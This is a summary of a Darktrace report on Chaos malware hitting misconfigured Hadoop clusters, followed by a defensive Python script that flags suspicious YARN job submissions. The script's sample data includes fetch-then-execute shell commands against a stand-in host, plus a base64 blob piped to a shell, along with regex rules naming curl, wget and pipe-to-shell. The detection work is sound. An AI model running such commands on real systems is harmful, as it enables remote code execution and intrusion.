
"Chaos malware is increasingly targeting misconfigured cloud deployments, expanding beyond its traditional focus on routers and edge devices, according to Darktrace's report."
"The malware is assessed to be an evolution of another DDoS malware known as Kaiji that has singled out misconfigured Docker instances."
"In the attack spotted by Darktrace, the intrusion commenced with an HTTP request to the Hadoop deployment to create a new application, which embedded shell commands to retrieve a Chaos agent binary."
"The domain used in the attack was previously associated with an email phishing campaign by the Chinese cybercrime group Silver Fox, indicating a potential link to Chinese threat actors."
Chaos malware has evolved to target misconfigured cloud deployments, moving beyond its initial focus on routers and edge devices. First documented in September 2022, it operates across Windows and Linux environments, executing remote shell commands, dropping modules, and launching DDoS attacks. The malware is linked to a previous variant known as Kaiji, which targeted misconfigured Docker instances. Evidence suggests a possible connection to Chinese threat actors, as indicated by the use of Chinese language characters and infrastructure. Darktrace identified this variant in a honeypot network, showcasing its capabilities in exploiting vulnerabilities.
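The intrusion path described above (an HTTP request that creates a new Hadoop application whose launch command pulls down and runs a binary) is something defenders can triage from the request bodies a reverse proxy or the ResourceManager audit trail records. The script below is an added example, not code from Darktrace or The Hacker News. It assumes the Hadoop deployment exposes the YARN ResourceManager REST API (POST /ws/v1/cluster/apps, where the launch command sits under am-container-spec.commands.command); the three request bodies, source addresses, application ids and the c2.invalid host name are constructed for this example and are not indicators from the report.

```python
import re

# Constructed sample submissions in the shape of YARN ResourceManager REST API
# requests (POST /ws/v1/cluster/apps). Every address, id and host name here is
# invented; the "malicious" bodies model the drop-and-execute pattern, nothing more.
SAMPLE_REQUESTS = [
    {
        "src": "10.0.5.12",
        "path": "/ws/v1/cluster/apps",
        "body": {
            "application-id": "application_1700000000000_0001",
            "application-name": "nightly-etl",
            "am-container-spec": {"commands": {
                "command": "/opt/spark/bin/spark-submit --class etl.Main /opt/jobs/etl.jar"}},
            "application-type": "SPARK",
        },
    },
    {
        "src": "203.0.113.77",
        "path": "/ws/v1/cluster/apps",
        "body": {
            "application-id": "application_1700000000000_0002",
            "application-name": "a",
            "am-container-spec": {"commands": {
                "command": "curl -fsSL http://c2.invalid/agent -o /tmp/.x; chmod +x /tmp/.x; /tmp/.x"}},
            "application-type": "YARN",
        },
    },
    {
        "src": "198.51.100.9",
        "path": "/ws/v1/cluster/apps",
        "body": {
            "application-id": "application_1700000000000_0003",
            "application-name": "b",
            # constructed base64 blob piped into a shell; the decoded text is harmless filler
            "am-container-spec": {"commands": {
                "command": "echo d2dldCBodHRwOi8vYy5pbnZhbGlkL3g= | base64 -d | sh"}},
            "application-type": "YARN",
        },
    },
]

# Detection rules, one per stage of the chain the Darktrace write-up describes:
# fetch something over HTTP, stage it on disk, make it executable, run it (or
# decode an embedded blob straight into a shell). Each is deliberately narrow.
RULES = [
    ("remote_fetch", re.compile(r"\b(curl|wget|tftp|ftpget)\b.*https?://", re.I)),
    ("pipe_to_shell", re.compile(r"\|\s*(sh|bash|dash|ash)\b")),
    # chmod on a path that is then invoked again later in the same command line
    ("staged_exec", re.compile(r"chmod\s+\S*x\s+([^\s;&|]+).*\1")),
    ("base64_decode", re.compile(r"base64\s+(-d|--decode)\b")),
    ("tmp_staging", re.compile(r"/(tmp|dev/shm|var/tmp)/\S+")),
]


def extract_launch_command(body: dict) -> str:
    """Pull the application-master launch command out of a submission body."""
    spec = body.get("am-container-spec") or {}
    cmds = spec.get("commands") or {}
    cmd = cmds.get("command", "")
    # YARN also accepts a list of command strings; normalise to one string
    return cmd if isinstance(cmd, str) else " ".join(map(str, cmd))


def analyse_submission(req: dict) -> dict:
    """Score one submission; two or more independent indicators raise an alert."""
    cmd = extract_launch_command(req["body"])
    hits = [name for name, rx in RULES if rx.search(cmd)]
    return {
        "src": req["src"],
        "app_id": req["body"].get("application-id"),
        "command": cmd,
        "indicators": hits,
        # a single hit (e.g. a /tmp path) is common in legitimate jobs, so require two
        "suspicious": len(hits) >= 2,
    }


def triage(requests: list) -> list:
    """Analyse every request that targets the application-submission endpoint."""
    return [analyse_submission(r) for r in requests
            if r.get("path", "").startswith("/ws/v1/cluster/apps")]


def suspicious_submissions(requests: list) -> list:
    return [f for f in triage(requests) if f["suspicious"]]


if __name__ == "__main__":
    for finding in triage(SAMPLE_REQUESTS):
        flag = "ALERT" if finding["suspicious"] else "ok   "
        print(f"{flag} {finding['src']:>15} {finding['app_id']} {finding['indicators']}")
```

The two-indicator threshold is the design choice worth keeping when adapting this to real logs: a lone /tmp path or a lone curl appears in plenty of legitimate jobs, while fetch-then-execute or decode-then-pipe combinations rarely do. The more durable control is the one the report implies by calling these deployments misconfigured: an application-submission endpoint reachable without authentication should not exist, so a hit from this script is also a prompt to check who is allowed to reach the ResourceManager at all.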
Read at The Hacker News